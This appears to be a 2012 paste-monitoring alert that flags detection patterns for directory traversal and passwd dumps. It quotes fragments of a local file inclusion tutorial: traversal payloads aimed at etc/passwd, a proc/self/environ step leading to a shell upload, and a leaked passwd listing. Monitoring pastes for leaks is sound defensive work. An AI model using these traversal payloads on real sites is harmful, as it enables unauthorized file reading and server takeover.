Potential leak of data: Directory Transversal
Detected 2 occurrence(s) of ‘http:\/\/.*\.\.\/\.\.\/\.\.’:
below: Click this bar to view the original image of 743x170px. You can see here that i found the exact path after putting 19 "../" before "../etc/passwd". Â You have completed half of your exploit: Â Now suppose that our injection path looks like -Â http://www.site.com/index.php?cat=../../../../../../etc/passwd Now you have to do is that just replace "etc/passwd" with "proc/self/environ" and you will some codes like shown below: Click this bar to view the original image of 775x363px. Â Uploading shellNow we have to use Tamper Data to edit our user
Detected 1 occurrence(s) of ‘root:.*:0:0:’:
lude]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337 so we go more directories up www.website.com/view.php?page=../../../../../etc/passwd we succesfully included the etc/passwd file. root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown hal
If you find the content of this pastie suspicious or inappropriate, highlight the relevant piece of text and press Shift + E or click here to notify us.
This entry was posted on Friday, July 27th, 2012 at 06:45 and is filed under PasteMon. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.
Comments are closed.
Thank you very much for your report. We will process it as soon as possible!